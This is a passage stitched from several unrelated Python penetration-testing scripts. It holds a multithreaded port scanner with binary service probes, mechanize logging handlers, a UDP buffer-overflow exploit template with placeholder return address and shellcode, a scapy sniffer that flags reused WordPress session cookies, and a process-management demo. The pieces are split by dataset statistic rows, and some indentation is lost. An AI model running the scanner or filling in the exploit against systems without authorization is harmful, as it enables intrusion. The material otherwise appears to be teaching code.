'\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f',
'\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0'
]
self.SIGNS =self.config.file2list("conf/signs.conf")
self.ports=[]
self.getports(user_ports)
self.lock = threading.Lock()
self.pinglist=[]
self.q=Queue()
self.sp=Queue()
self.signs=self.prepsigns()
self.ipdict={}
self.ipdict['ldap']=[]
self.ipdict['mysql']=[]
self.ipdict['mssql']=[]
self.ipdict['ftp']=[]
self.ipdict['ssh']=[]
self.ipdict['smb']=[]
self.ipdict['vnc']=[]
self.ipdict['pop3']=[]
self.ipdict['rsync']=[]
self.ipdict['http']=[]
self.ipdict['https']=[]
self.ipdict['mongodb']=[]
self.ipdict['postgres']=[]
self.ipdict['redis']=[]
self.ipdict['ssl']=[]
self.ipdict['Unknown']=[]
	# build the list of ports to scan
def getports(self,user_ports):
if user_ports=='':
self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060]
else:
try:
if user_ports.find(",")>0:
for port in user_ports.split(','):
self.ports.append(int(port))
elif user_ports.find("-")>0:
startport=int(user_ports.split('-')[0])
endport=int(user_ports.split('-')[1])
for i in xrange(startport,endport+1):
self.ports.append(i)
else:
self.ports.append(int(user_ports))
except :
				printRed('[!] not a valid port list given. you should specify ports like 22,80,1433 or 22-1000')
exit()
	# ping scan worker function
def pinger(self):
while True:
ip=self.q.get()
if platform.system()=='Linux':
p=Popen(['ping','-c 2',ip],stdout=PIPE)
m = re.search('(\d)\sreceived', p.stdout.read())
try:
if m.group(1)!='0':
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Darwin':
import commands
p=commands.getstatusoutput("ping -c 2 "+ip)
m = re.findall('ttl', p[1])
try:
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Windows':
p=Popen('ping -n 2 ' + ip, stdout=PIPE)
m = re.findall('TTL', p.stdout.read())
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
self.q.task_done()
def pingscan(self,isping,threads,ips):
starttime=time.time()
friststarttime=time.time()
print "[*] start Scanning at %s" % time.ctime()
		# isping=='no' disables the ping sweep
		# ping sweep is performed by default
if isping=='yes':
print "Scanning for live machines..."
for i in xrange(threads):
t = Thread(target=self.pinger)
t.setDaemon(True)
t.start()
for ip in ips:
self.q.put(ip)
self.q.join()
else:
self.pinglist=ips
if len(self.pinglist)==0:
			print "did not find any live machines - -|||"
exit()
print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime)
def prepsigns(self):
signlist=[]
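		# each line of conf/signs.conf is assumed to be "label|regex-pattern",
		# e.g. a hypothetical entry "ssh|^SSH-" would tag banners starting
		# with "SSH-" as the ssh service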
for item in self.SIGNS:
(label,pattern)=item.split('|',2)
sign=(label,pattern)
signlist.append(sign)
return signlist
def matchbanner(self,banner,slist):
#print banner
for item in slist:
p=re.compile(item[1])
#print item[1]
if p.search(banner)!=None:
return item[0]
return 'Unknown'
	# scan ports and identify their corresponding service types
def scanports(self):
while True:
ip,port=self.sp.get()
#print ip,port
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
			# determine the service type of the port
service='Unknown'
try:
s.connect((ip,port))
except:
self.sp.task_done()
continue
try:
result = s.recv(256)
service=self.matchbanner(result,self.signs)
except:
for probe in self.PROBES:
#print probe
try:
s.close()
sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.settimeout(5)
sd.connect((ip,port))
sd.send(probe)
except:
continue
try:
result=sd.recv(256)
service=self.matchbanner(result,self.signs)
if service!='Unknown':
break
except:
continue
if service not in self.ipdict:
self.ipdict[service]=[]
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
else:
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
self.sp.task_done()
def portsscan(self,threads,file):
print "Scanning ports now..."
print "[*] start Scanning live machines' ports at %s" % time.ctime()
starttime=time.time()
for i in xrange(threads):
st=Thread(target=self.scanports)
st.setDaemon(True)
st.start()
for scanip in self.pinglist:
for port in self.ports:
self.sp.put((scanip,port))
self.sp.join()
print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime)
		# write the service/port information to the output file
for name in self.ipdict.keys():
if len(self.ipdict[name]):
contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n'
self.config.write_file(contents=contents,file=file)
	# handle services that were not identified by banner matching
def handleunknown(self):
for ip in self.ipdict['Unknown']:
#print ip
try:
if str(ip).split(':')[1]=='389':
self.ipdict['ldap'].append(ip)
if str(ip).split(':')[1]=='445':
self.ipdict['smb'].append(ip)
if str(ip).split(':')[1] in ['3306','3307','3308','3309']:
self.ipdict['mysql'].append(ip)
if str(ip).split(':')[1]=='1433':
self.ipdict['mssql'].append(ip)
if str(ip).split(':')[1] in ['10022','22']:
self.ipdict['ssh'].append(ip)
if str(ip).split(':')[1]=='27017':
self.ipdict['mongodb'].append(ip)
if str(ip).split(':')[1]=='110':
self.ipdict['pop3'].append(ip)
if str(ip).split(':')[1]=='5432':
self.ipdict['postgres'].append(ip)
if str(ip).split(':')[1]=='443':
self.ipdict['ssl'].append(ip)
if str(ip).split(':')[1]=='873':
self.ipdict['rsync'].append(ip)
if str(ip).split(':')[1]=='6379':
self.ipdict['redis'].append(ip)
# if str(ip).split(':')[1]=='21':
# self.ipdict['ftp'].append(ip)
except Exception as e:
print e
		# handle mongodb instances that were identified as http
for ip in self.ipdict['http']:
if str(ip).split(':')[1]=='27017':
self.ipdict['http'].remove(ip)
self.ipdict['mongodb'].append(ip)
def run(self,isping,threads,ips,file):
self.pingscan(isping,threads,ips)
self.portsscan(threads,file)
self.handleunknown()
| 39.59322 | 1,173 | 0.542843 |
PenetrationTestingScripts | import logging
from _response import response_seek_wrapper
from _urllib2_fork import BaseHandler
class HTTPResponseDebugProcessor(BaseHandler):
handler_order = 900 # before redirections, after everything else
def http_response(self, request, response):
if not hasattr(response, "seek"):
response = response_seek_wrapper(response)
info = logging.getLogger("mechanize.http_responses").info
try:
info(response.read())
finally:
response.seek(0)
info("*****************************************************")
return response
https_response = http_response
class HTTPRedirectDebugProcessor(BaseHandler):
def http_request(self, request):
if hasattr(request, "redirect_dict"):
info = logging.getLogger("mechanize.http_redirects").info
info("redirecting to %s", request.get_full_url())
return request
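
# A minimal usage sketch (assumed, not part of mechanize itself): these processors
# only emit through the standard logging module, so a handler must be attached to
# the logger names used above, for example:
#
#   import logging, sys
#   logger = logging.getLogger("mechanize.http_responses")
#   logger.setLevel(logging.INFO)
#   logger.addHandler(logging.StreamHandler(sys.stdout))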
| 31.37931 | 69 | 0.624733 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: udp_exploit.py
Purpose: An sample exploit for testing UDP services
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, struct
rhost = ""
lhost = ""
rport =
fill ="A"*####
eip = struct.pack('<I',0x########)
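# struct.pack('<I', value) encodes the return address as a 4-byte little-endian
# unsigned int, e.g. struct.pack('<I', 0x41424344) yields '\x44\x43\x42\x41'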
offset = "\x90"*##
available_shellcode_space = ###
shell =() #Code to insert
# NOPs to fill the remaining space
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(exploit, (rhost, rport))
| 45.547619 | 89 | 0.775333 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import optparse
from scapy.all import *
cookieTable = {}
def fireCatcher(pkt):
raw = pkt.sprintf('%Raw.load%')
r = re.findall('wordpress_[0-9a-fA-F]{32}', raw)
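    # the pattern matches WordPress session cookie names: 'wordpress_' followed by
    # 32 hex characters, e.g. (hypothetical) wordpress_5f4dcc3b5aa765d61d8327deb882cf99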
if r and 'Set' not in raw:
if r[0] not in cookieTable.keys():
cookieTable[r[0]] = pkt.getlayer(IP).src
print '[+] Detected and indexed cookie.'
elif cookieTable[r[0]] != pkt.getlayer(IP).src:
print '[*] Detected Conflict for ' + r[0]
print 'Victim = ' + cookieTable[r[0]]
print 'Attacker = ' + pkt.getlayer(IP).src
def main():
parser = optparse.OptionParser("usage %prog -i <interface>")
parser.add_option('-i', dest='interface', type='string',\
help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
sniff(filter='tcp port 80', prn=fireCatcher)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
| 24.590909 | 64 | 0.576889 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
import multiprocessing as mp
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(processName)-10s) %(message)s',
)
class Processes():
def __init__(self):
pass
def execute(self,id):
time.sleep(1)
logging.debug("Executed Process : " +str(id))
obj=Processes()
process_list=[]
for i in range(10):
p=mp.Process(name="Process_"+str(i),target=obj.execute,args=(i,))
process_list.append(p)
p.start()
main_process=mp.current_process()
logging.debug("Waiting for 3 seconds")
counter =0
for p in process_list:
if p.is_alive() and counter < 1:
p.join(3)
counter=counter + 1
else:
if p.is_alive():
logging.debug("Killing process: " +p.name )
p.terminate()
logging.debug("Main Ended")
| 20.972222 | 66 | 0.655696 |